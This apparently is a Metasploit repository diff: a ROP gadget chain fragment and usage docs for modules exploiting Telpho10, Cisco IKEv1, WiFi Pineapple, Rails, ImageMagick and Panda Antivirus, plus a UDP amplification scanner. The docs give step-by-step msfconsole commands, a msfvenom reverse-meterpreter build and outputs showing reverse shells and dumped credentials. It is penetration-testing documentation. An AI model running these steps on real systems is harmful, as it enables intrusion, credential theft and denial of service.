<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x00065467">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000c409">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
</db>
|
|
@ -11,7 +11,7 @@
|
|||
#
|
||||
# It's strongly recommended that you check this file into your version control system.
|
||||
|
||||
ActiveRecord::Schema.define(version: 20160415153312) do
|
||||
ActiveRecord::Schema.define(version: 20161004165612) do
|
||||
|
||||
# These are extensions that must be enabled in order to support this database
|
||||
enable_extension "plpgsql"
|
||||
|
@ -806,6 +806,7 @@ ActiveRecord::Schema.define(version: 20160415153312) do
|
|||
t.string "description", limit: 4096
|
||||
t.integer "owner_id"
|
||||
t.boolean "limit_to_network", default: false, null: false
|
||||
t.boolean "import_fingerprint", default: false
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -0,0 +1,133 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
|
||||
|
||||
Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
The following steps will allow you to install and dump the credentials from a Telpho10 instance:
|
||||
|
||||
1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
|
||||
- note that the ISO will default to a German keyboard layout
|
||||
- note that the ISO expects a SATA hard drive (not IDE/PATA) for installation
|
||||
1. configure the Telpho10's IP address
|
||||
- edit /etc/networks/interfaces accordingly
|
||||
1. Start msfconsole
|
||||
1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
|
||||
1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
|
||||
1. Do: ```run```
|
||||
1. You should see a list of the retrieved Telpho10 credentials
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example output when using this against a Telpho10 v2.6.31 VM:
|
||||
|
||||
```
|
||||
$ ./msfconsole
|
||||
|
||||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
||||
|
||||
|
||||
=[ metasploit v4.12.36-dev-16fc6c1 ]
|
||||
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
|
||||
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
|
||||
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
|
||||
|
||||
msf > use auxiliary/admin/http/telpho10_credential_dump
|
||||
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
|
||||
RHOST => 10.0.2.35
|
||||
msf auxiliary(telpho10_credential_dump) > run
|
||||
|
||||
[*] Generating backup
|
||||
[*] Downloading backup
|
||||
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
|
||||
[*] Dumping credentials
|
||||
|
||||
[*] Login (/telpho/login.php)
|
||||
[*] -------------------------
|
||||
[+] Username: admin
|
||||
[+] Password: telpho
|
||||
|
||||
[*] MySQL (/phpmyadmin)
|
||||
[*] -------------------
|
||||
[+] Username: root
|
||||
[+] Password: telpho
|
||||
|
||||
[*] LDAP (/phpldapadmin)
|
||||
[*] --------------------
|
||||
[+] Username: cn=admin,dc=localdomain
|
||||
[+] Password: telpho
|
||||
|
||||
[*] Asterisk MI (port 5038)
|
||||
[*] -----------------------
|
||||
[+] Username: telpho
|
||||
[+] Password: telpho
|
||||
|
||||
[*] Mail configuration
|
||||
[*] ------------------
|
||||
[+] Mailserver:
|
||||
[+] Username:
|
||||
[+] Password:
|
||||
[+] Mail from:
|
||||
|
||||
[*] Online Backup
|
||||
[*] -------------
|
||||
[+] ID:
|
||||
[+] Password:
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(telpho10_credential_dump) >
|
||||
```
|
||||
|
||||
I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
|
||||
|
||||
```
|
||||
msf auxiliary(telpho10_credential_dump) > run
|
||||
|
||||
[*] Generating backup
|
||||
[*] Downloading backup
|
||||
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
|
||||
[*] Dumping credentials
|
||||
|
||||
[*] Login (/telpho/login.php)
|
||||
[*] -------------------------
|
||||
[+] Username: admin
|
||||
[+] Password: s3cr3t
|
||||
|
||||
[*] MySQL (/phpmyadmin)
|
||||
[*] -------------------
|
||||
[+] Username: root
|
||||
[+] Password: telpho
|
||||
|
||||
[*] LDAP (/phpldapadmin)
|
||||
[*] --------------------
|
||||
[+] Username: cn=admin,dc=localdomain
|
||||
[+] Password: ldaps3cr3t
|
||||
|
||||
[*] Asterisk MI (port 5038)
|
||||
[*] -----------------------
|
||||
[+] Username: telpho
|
||||
[+] Password: asterisks3cr3t
|
||||
|
||||
[*] Mail configuration
|
||||
[*] ------------------
|
||||
[+] Mailserver:
|
||||
[+] Username:
|
||||
[+] Password:
|
||||
[+] Mail from:
|
||||
|
||||
[*] Online Backup
|
||||
[*] -------------
|
||||
[+] ID:
|
||||
[+] Password:
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,34 @@
|
|||
This module is for CVE-2016-6415, A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
|
||||
|
||||
The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ike/cisco_ike_benigncertain```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
```
|
||||
msf auxiliary(cisco_ike_benigncertain) > show options
|
||||
|
||||
Module options (auxiliary/scanner/ike/cisco_ike_benigncertain):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PACKETFILE /opt/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw yes The ISAKMP packet file
|
||||
RHOSTS 192.168.1.2 yes The target address range or CIDR identifier
|
||||
RPORT 500 yes The target port
|
||||
THREADS 1 yes The number of concurrent threads
|
||||
|
||||
msf auxiliary(cisco_ike_benigncertain) > set verbose True
|
||||
msf auxiliary(cisco_ike_benigncertain) > run
|
||||
|
||||
[*] Printable info leaked:
|
||||
>5..).........9.................................................................x...D.#..............+#.........\.....?.L...l...........h.............#.....................l...\...........l.....X.................a.#...R....X.....y#.........x...@V$.\.............X.<....X................W....._y>..#t... .....H...X.....W.......................................>.$...........>5..).............................!.....:3.K......X.............xV4.xV4.xV4.......................................X...........X.:3.KxV4.xV4.................$...m;......xV4.xV4.xV4.xV4.xV4.xV4.xV4.xV4...........!.....<<<<........................................................................................................................................................<<<<....................$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<<<<1.......................................<<<<....9....... .......d....................Q..........<<<<....9....... ...............(............Q..........<<<<........................CI................................................................................ab_cdefg_pool...................................................................................................................................................................................ozhu7vp...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
|
||||
[+] 192.168.1.2:500 - IKE response with leak
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,125 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Any reachable UDP endpoint is a potential target.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: ```use auxiliary/scanner/udp/udp_amplification```
|
||||
3. Do `set RHOSTS [targets]`, replacing ```[targets]``` with the hosts you wish to assess.
|
||||
4. Do ```set PORTS [ports]```, replacing ```[ports]``` with the list of UDP ports you wish to assess on each asset.
|
||||
5. Optionally, ```set PROBE [probe]```, replacing ```[probe]``` with a string or `file://` resource to serve as the UDP payload
|
||||
6. Do: ```run```
|
||||
7. If any of the endpoints were discovered to be vulnerable to UDP amplification with the probe you specified, status will be printed indicating as such.
|
||||
|
||||
## Options
|
||||
|
||||
**PORTS**
|
||||
|
||||
This is the list of ports to test for UDP amplification on each host.
|
||||
Formats like `1,2,3`, `1-3`, `1,2-3`, etc, are all supported. You'll
|
||||
generally only want to specify a small, targeted set of ports with an
|
||||
appropriately tailored `PROBE` value, described below
|
||||
|
||||
**PROBE**
|
||||
|
||||
This is the payload to send in each UDP datagram. Unset or set to the empty
|
||||
string `''` or `""` to send empty UDP datagrams, or use the `file://`
|
||||
resource to specify a local file to serve as the UDP payload.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
resource (amp.rc)> use auxiliary/scanner/udp/udp_amplification
|
||||
resource (amp.rc)> set RHOSTS 10.10.16.0/20 192.168.3.0/23
|
||||
RHOSTS => 10.10.16.0/20 192.168.3.0/23
|
||||
resource (amp.rc)> set PORTS 17,19,12345
|
||||
PORTS => 17,19,12345
|
||||
resource (amp.rc)> set THREADS 100
|
||||
THREADS => 100
|
||||
resource (amp.rc)> set PROBE 'test'
|
||||
PROBE => test
|
||||
resource (amp.rc)> run
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
|
||||
[*] Sending 4-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
|
||||
[*] Scanned 512 of 4608 hosts (11% complete)
|
||||
[+] 10.10.17.153:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 10.10.20.47:17 - susceptible to UDP amplification: No packet amplification and a 40x, 159-byte bandwidth amplification
|
||||
[*] Scanned 2560 of 4608 hosts (55% complete)
|
||||
[+] 10.10.23.199:19 - susceptible to UDP amplification: No packet amplification and a 256x, 1020-byte bandwidth amplification
|
||||
[+] 10.10.23.248:17 - susceptible to UDP amplification: No packet amplification and a 26x, 103-byte bandwidth amplification
|
||||
[*] Scanned 3584 of 4608 hosts (77% complete)
|
||||
[*] Scanned 3840 of 4608 hosts (83% complete)
|
||||
[+] 10.10.30.202:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[*] Scanned 4096 of 4608 hosts (88% complete)
|
||||
[+] 192.168.3.64:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.71:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.73:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.77:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.100:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.3.118:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
|
||||
[+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
|
||||
[*] Scanned 4352 of 4608 hosts (94% complete)
|
||||
[+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
|
||||
[*] Scanned 4608 of 4608 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
Similarly, but with empty UDP datagrams instead:
|
||||
|
||||
```
|
||||
resource (amp.rc)> unset PROBE
|
||||
Unsetting PROBE...
|
||||
resource (amp.rc)> run
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
|
||||
[*] Sending 0-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
|
||||
[+] 10.10.17.229:17 - susceptible to UDP amplification: No packet amplification and a 107x, 107-byte bandwidth amplification
|
||||
[+] 10.10.26.252:19 - susceptible to UDP amplification: No packet amplification and a 3892x, 3892-byte bandwidth amplification
|
||||
[*] Scanned 4096 of 4608 hosts (88% complete)
|
||||
[+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
|
||||
[+] 192.168.3.114:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
|
||||
[+] 192.168.3.115:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
|
||||
[+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
|
||||
[+] 192.168.3.184:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
|
||||
[*] Scanned 4352 of 4608 hosts (94% complete)
|
||||
[+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
|
||||
[+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
|
||||
[*] Scanned 4608 of 4608 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,21 @@
|
|||
## Background
|
||||
|
||||
The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
|
||||
pre-authorized CSS files, which allows the attacker to bypass
|
||||
authentication. The exploit then relies on the anti-CSRF vulnerability
|
||||
(CVE-2015-4624) to obtain command injection.
|
||||
|
||||
This exploit uses a utility function in
|
||||
/components/system/configuration/functions.php to execute commands once
|
||||
authorization has been bypassed.
|
||||
|
||||
## Verification
|
||||
|
||||
This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
|
||||
default options are generally effective due to having a set state after being
|
||||
flashed. You will need to be connected to the WiFi pineapple network (e.g. via
|
||||
WiFi or ethernet).
|
||||
|
||||
Assuming the above 2.3 firmware is installed, this exploit should always work.
|
||||
If it does not, try it again. It should always work as long as the pineapple is
|
||||
in its default configuration.
|
|
@ -0,0 +1,28 @@
|
|||
## Background
|
||||
|
||||
This module uses a challenge solver exploit which impacts two possible states
|
||||
of the device: pre-password set and post-password set. The pre-password set
|
||||
vulnerability uses a default password and a weak anti-CSRF (CVE-2015-4624)
|
||||
check to obtain shell by logging in and pre-computing the solution to
|
||||
the anti-CSRF check.
|
||||
|
||||
The post-password set vulnerability uses the fact that there is a 1 in 27
|
||||
chance of correctly guessing the challenge solution. This attack resets the
|
||||
password to a password chosen by the attacker (we suggest the default
|
||||
'pineapplesareyummy' to decrease collateral damage on victims) and then
|
||||
performs the same anti-CSRF attack as the pre-password vulnerability.
|
||||
|
||||
This exploit uses a utility function in
|
||||
/components/system/configuration/functions.php to execute commands once
|
||||
authorization has been bypassed.
|
||||
|
||||
## Verification
|
||||
|
||||
This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
|
||||
default options are generally effective due to having a set state after being
|
||||
flashed. You will need to be connected to the WiFi pineapple network (e.g. via
|
||||
WiFi or ethernet).
|
||||
|
||||
Assuming the above 2.3 firmware is installed, this exploit should always work.
|
||||
If it does not, try it again. It should always work as long as the pineapple is
|
||||
in its default configuration.
|
|
@ -0,0 +1,79 @@
|
|||
## Intro
|
||||
|
||||
Rails is a web application development framework written in the Ruby language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks.
|
||||
|
||||
http://rubyonrails.org/
|
||||
|
||||
> This module exploits the rendering vulnerability via a temporary file upload to pop a shell (CVE-2016-0752).
|
||||
|
||||
## Setup
|
||||
|
||||
**Download and setup the sample vuln application:**
|
||||
|
||||
- [ ] `sudo apt-get install -y curl git`
|
||||
- [ ] `curl -L https://get.rvm.io | bash -s stable --autolibs=3 --ruby=2.3.1`
|
||||
- [ ] `source ~/.rvm/scripts/rvm`
|
||||
- [ ] `sudo apt-get install rubygems ruby-dev nodejs zlib1g-dev -y`
|
||||
- [ ] `gem install rails -v 4.0.8`
|
||||
- [ ] `git clone https://github.com/forced-request/rails-rce-cve-2016-0752 pwn`
|
||||
- [ ] `cd pwn`
|
||||
- [ ] `bundle install`
|
||||
- [ ] Edit the config/routes.rb file and add `post "users/:id", to: 'user#show'`
|
||||
|
||||
Basically, you just need a POST endpoint for the temporary file upload trick. Now you can start the rails server and test the module.
|
||||
|
||||
- [ ] `rails s -b 0.0.0.0` or `rails s -b 0.0.0.0 -e production`
|
||||
|
||||
## Usage
|
||||
|
||||
### Typical Usage
|
||||
|
||||
Just set ```RHOST``` and fire off the module! It's pretty much painless.
|
||||
```set VERBOSE true``` if you want to see details.
|
||||
|
||||
```
|
||||
saturn:metasploit-framework mr_me$ cat scripts/rails.rc
|
||||
use exploit/multi/http/rails_dynamic_render_code_exec
|
||||
set RHOST 172.16.175.251
|
||||
set payload linux/x86/meterpreter/reverse_tcp
|
||||
set LHOST 172.16.175.1
|
||||
check
|
||||
exploit
|
||||
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/rails.rc
|
||||
[*] Processing scripts/rails.rc for ERB directives.
|
||||
resource (scripts/rails.rc)> use exploit/multi/http/rails_dynamic_render_code_exec
|
||||
resource (scripts/rails.rc)> set RHOST 172.16.175.251
|
||||
RHOST => 172.16.175.251
|
||||
resource (scripts/rails.rc)> set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
resource (scripts/rails.rc)> set LHOST 172.16.175.1
|
||||
LHOST => 172.16.175.1
|
||||
resource (scripts/rails.rc)> check
|
||||
[+] 172.16.175.251:3000 The target is vulnerable.
|
||||
resource (scripts/rails.rc)> exploit
|
||||
[*] Exploit running as background job.
|
||||
[*] Started reverse TCP handler on 172.16.175.1:4444
|
||||
|
||||
[*] Sending initial request to detect exploitability
|
||||
msf exploit(rails_dynamic_render_code_exec) > [*] 172.16.175.251:3000 - Starting up our web service on http://172.16.175.1:1337/iUDaRVpz ...
|
||||
[*] Using URL: http://0.0.0.0:1337/iUDaRVpz
|
||||
[*] Local IP: http://192.168.100.13:1337/iUDaRVpz
|
||||
[*] uploading image...
|
||||
[+] injected payload
|
||||
[*] 172.16.175.251:3000 - Sending the payload to the server...
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 172.16.175.251
|
||||
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.251:41246) at 2016-09-29 17:52:00 -0500
|
||||
[+] Deleted /tmp/NhhGKCCIgwF
|
||||
|
||||
msf exploit(rails_dynamic_render_code_exec) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > shell
|
||||
Process 50809 created.
|
||||
Channel 1 created.
|
||||
$ id
|
||||
uid=1000(student) gid=1000(student) groups=1000(student),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
|
||||
$
|
||||
```
|
|
@ -0,0 +1,54 @@
|
|||
## Vulnerable Application
|
||||
|
||||
ImageMagick
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Install the ImageMagick
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
|
||||
4. Do: ```run```
|
||||
5. convert msf.png msf.jpg
|
||||
|
||||
## Options
|
||||
|
||||
**USE_POPEN**
|
||||
|
||||
When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
|
||||
When the option is set to `false`, target 2 (PS file) is valid
|
||||
|
||||
## Scenarios
|
||||
|
||||
## popen=true
|
||||
```
|
||||
msf exploit(imagemagick_delegate) > set target 0
|
||||
msf exploit(imagemagick_delegate) > run
|
||||
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||||
[*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
|
||||
```
|
||||
|
||||
```
|
||||
msf exploit(imagemagick_delegate) > set target 1
|
||||
msf exploit(imagemagick_delegate) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.6.0.186:4444
|
||||
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||||
[*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
|
||||
```
|
||||
|
||||
## popen=false
|
||||
```
|
||||
msf exploit(imagemagick_delegate) > set target 2
|
||||
target => 2
|
||||
msf exploit(imagemagick_delegate) > set USE_POPEN false
|
||||
USE_POPEN => false
|
||||
msf exploit(imagemagick_delegate) > run
|
||||
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||||
[*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
|
||||
```
|
|
@ -0,0 +1,154 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
|
||||
|
||||
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
|
||||
|
||||
The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
|
||||
|
||||
1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
|
||||
2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Install the application
|
||||
2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
|
||||
3. Start msfconsole
|
||||
4. Get a shell
|
||||
5. Do: `use exploit/windows/local/panda_psevents`
|
||||
6. Do: `set session #`
|
||||
7. Do: `exploit`
|
||||
8. Go do something else while you wait
|
||||
9. Enjoy being system with your shell
|
||||
|
||||
## Options
|
||||
|
||||
**DLL**
|
||||
|
||||
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
|
||||
|
||||
| | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|
||||
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
|
||||
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
|
||||
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
|
||||
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
|
||||
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
|
||||
| 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | |
|
||||
|
||||
In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell.
|
||||
|
||||
**ListenerTimeout**
|
||||
|
||||
How long to wait for a shell. PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2
|
||||
|
||||
Step 1, get a local shell. I used msfvenom to drop an exe for easy user level meterpreter.
|
||||
|
||||
msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
|
||||
|
||||
msf > use exploit/multi/handler
|
||||
msf exploit(handler) > set payload windows/meterpreter_reverse_tcp
|
||||
payload => windows/meterpreter_reverse_tcp
|
||||
msf exploit(handler) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(handler) > set lport 4449
|
||||
lport => 4449
|
||||
msf exploit(handler) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4449
|
||||
[*] Starting the payload handler...
|
||||
[*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: IE11Win8_1\IEUser
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
|
||||
Step 2, drop our panda exploit
|
||||
|
||||
use exploit/windows/local/panda_psevents
|
||||
msf exploit(panda_psevents) > set session 1
|
||||
session => 1
|
||||
